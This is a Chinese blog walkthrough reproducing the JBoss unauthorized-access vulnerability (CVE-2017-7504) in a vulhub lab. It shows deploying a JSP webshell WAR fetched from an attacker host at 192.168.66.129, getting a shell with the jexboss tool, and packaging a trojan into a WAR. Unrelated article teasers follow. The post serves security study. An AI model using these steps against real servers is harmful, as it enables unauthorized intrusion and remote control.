JBOSS未授权访问漏洞复现

摘要:
目录1.JBOSS是什么2.JBOSS未授权访问是什么3.漏洞环境搭建4.漏洞复现进入控制台进入应用部署页面上马5.jexboss工具安装方法:6.war的制作1.JBOSS是什么JBOSS是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。yes就是创建连接。
目录

1.JBOSS是什么

JBOSS是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

2.JBOSS未授权访问是什么

未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。

3.漏洞环境搭建

漏洞环境:vulhub上的CVE-2017-7504
进入到CVE-2017-7504目录执行docker-compose up -d

4.漏洞复现

说白了,这个未授权就是不需要用户名和密码就进入控制台,然后利用应用部署来部署war包,war包里有个jsp的马,然后真香!!!

靶机的ip为192.168.66.134.
访问192.168.66.134:8080,进入jboss。

进入控制台

看到如下界面,点击红色框选的:
JBOSS未授权访问漏洞复现第1张
网上的一些帖子说的是无用户名和密码登录的,也就是说不需要密码。但是我这里用vulhub搭建的居然需要用户名和密码,额,我人品的问题???随便试了试,用户名、密码都是admin,进入控制台。
JBOSS未授权访问漏洞复现第2张

进入应用部署页面

又点这个呗,进入应用部署界面。进入之后找到下面的部分:
JBOSS未授权访问漏洞复现第3张

上马

ParamValue部分填写远程服务器上的木马的地址。
这里用kali的apache2来弄,毕竟简单。
进入kali,输入service apache2 start启动apache2.(可以输入service apache2 status来看看是否开启,下图就是开启状态了)
JBOSS未授权访问漏洞复现第4张
然后便是将war包放在/var/www/html目录,至于为啥放这里,请自行百度一哈。
我这里用的是冰蝎的bingxie.war。
JBOSS未授权访问漏洞复现第5张
然后就是在ParamValue处填写地址了,我这里就填写http://192.168.66.129/bingxie.war
注:192.168.66.129是kali的ip地址
然后就点Invoke。回显一下页面,就知道可以了。
JBOSS未授权访问漏洞复现第6张
去看看到底弄好没,输入http://192.168.66.134:8080/bingxie/
后面的bingxie就是前面部署的war包的名字
JBOSS未授权访问漏洞复现第7张
看到了shell.jsp,可以拿出冰蝎了。
JBOSS未授权访问漏洞复现第8张

5.jexboss工具

安装方法:

git clone https://github.com/joaomatosf/jexboss
cd jexboss
python3 jexboss.py

出现以下界面便是能够正常使用。
JBOSS未授权访问漏洞复现第9张
也可以输入python3 jexboss.py -h查看具体参数。
这里我是输入:python3 jexboss.py -u 192.168.66.134:8080
执行命令后出现下面的界面就说明可以搞事情:
JBOSS未授权访问漏洞复现第10张
等执行完后会弹出个选择yes or no,当然选yes。yes就是创建连接。
一输入yes,我本机的火绒就搞事情了。。。
JBOSS未授权访问漏洞复现第11张
真就管的宽,不过我喜欢!!!
回到正题,输入yes后,就会有个shell的命令行,舒服啊!
JBOSS未授权访问漏洞复现第12张

6.war的制作

首先你得有Java环境,然后进入jdk目录下的bin目录(例如C:Program FilesJavajdk1.8.0_101in),进入命令行。
输入jar cvf shell.war shell.jsp
注:shell.war是你要做出了的war文件,shell.jsp是提前准备的jsp木马文件
JBOSS未授权访问漏洞复现第13张
诶,弄完了。。。溜了溜了,防御啥的随便找点文章看看,多的很。

免责声明:文章转载自《JBOSS未授权访问漏洞复现》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇url传值的长度限制解决办法QT中文乱码与国际化支持下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

shell三剑客之find

查找以ini结尾的文件[root@iZj6cbstl2n6r280a27eppZ app]# find / -name "*.ini"/app/myblog/config.ini exec解释:-exec 参数后面跟的是 command 命令,它的终止是以';'为结束标志的,所以这句命令后面的分号是不可缺少的,考虑到各个系统中分号会有不同的意义,所以前面加...

virsh 连接虚拟机 (vnc 或 控制台)

第一种方式 1.如果虚拟机登录方式为VNC,在ubuntu机器上安装vncviewer 在虚拟机的配置xml中 <graphics type="vnc" autoport="yes" keymap="en-us" listen="0.0.0.0"/> 安装vncviewer $apt-get install vncviewer 查看该虚拟机的端...

Visual LISP 第4章 有关Visual LISP的基本操作(3)控制台操作

1.控制台窗口与AutoCAD命令窗口的区别 (1)控制台窗口的命令提示符为"_$"。 (2)空格键只是空格,不再代表回车,只有按下回车键,系统才对表达式求值。 (3)按Ctrl+Enter键,可以将未输入玩的表达式续写到下一行。 (4)按Esc键,取消当前的输入,按Shift+Esc键,终止当前的操作,返回控制台的提示"_$"。 (5)查看变量值不用在变...

Shell排序和二叉树排序

Shell排序 #include<iostream> using namespace std; void Print(int *list, int len); void ShellSort(int *list, int *list2, int len, int gap); void ShellSort(int *list, int *li...

SpringBoot入门 (三) 日志配置

上一篇博文记录了再springboot项目中读取属性文件中配置的属性,本文学习在springboot项目中记录日志。   日志记录在项目中是很常见的一个功能了,对排查问题有很大帮助,也可以做分类分析及统计。SpringBoot内部使用的是Commons Logging做日志的记录,但是对其他的日志框架也提供了默认的配置,如:Java util Loggin...

Linux下模拟多线程的并发并发shell脚本

 分享一个在Linux下模拟多线程的并发脚本,使用这个脚本可以同时批量在定义数量的服务器上执行相关命令,比起普通for/while循环只能顺序一条一条执行的效率高非常多,在管理大批服务器时非常的实用。     以下脚本功能是通过scp(也可选rsync)向上千台服务器传更新包,脚本运行后同时在后台有50个scp进程向服务器传包。#!/bin/baship=...